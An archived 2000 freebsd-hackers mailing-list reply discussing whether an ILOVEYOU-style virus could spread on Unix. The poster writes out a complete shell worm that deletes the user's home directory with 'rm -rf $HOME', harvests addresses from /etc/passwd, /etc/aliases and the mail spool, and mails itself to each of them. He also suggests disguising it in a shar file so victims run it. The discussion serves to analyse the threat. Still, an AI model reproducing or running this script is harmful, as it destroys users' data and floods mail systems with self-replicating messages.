On Thu, 4 May 2000, Jeremiah Gowdy wrote:
>lol. The only way you could really have a virus in freebsd is if it was
>launched or infected as root. Otherwise the virus would be VERY limited.
I don't agree that it would be limited. The reason for the "success" of
ILOVEYOU is that its replication is simple. On a typical PC nowadays
(500MHz I guess) and with a easily accessed "global address list" (company
wide shared address book) you can send out a lot of messages.
My point is that the act of sending out the messages is the worst part of
this "virus". From a DoS point of view, that's all you need to do.
On a Unix system a similar script could send out messages too, but without
a shared GAL there aren't as many targets:
#!/bin/sh
# this script is called "/tmp/mytext"
# first do damage (in background, this is Unix after all)
rm -rf $HOME &
# now replicate - perhaps we should have three subprocesses here?
for i in `awk -F: '{print $1}' /etc/passwd`; do
mail -s ILOVEYOU $i < /tmp/mytext
done
# could have used awk...
for i in `grep '^[.a-zA-Z0-9-]*:' /etc/aliases | sed 's/:.*//'`; do
mail -s ILOVEYOU $i < /tmp/mytext
done
for i in `sed -n 's/^.*[ ,]\([.a-zA-Z0-9-]*@[.a-zA-Z0-9-]*\).*$/\1/p'
/var/mail/$USER`; do
mail -s ILOVEYOU $i < /tmp/mytext
done
Of course the hard job would be to get someone to execute something
containing this script. Perhaps embedded in a "shar" file? (does anyone
still use shar?)
Aled
To Unsubscribe: send mail to [EMAIL PROTECTED]
with "unsubscribe freebsd-hackers" in the body of the message
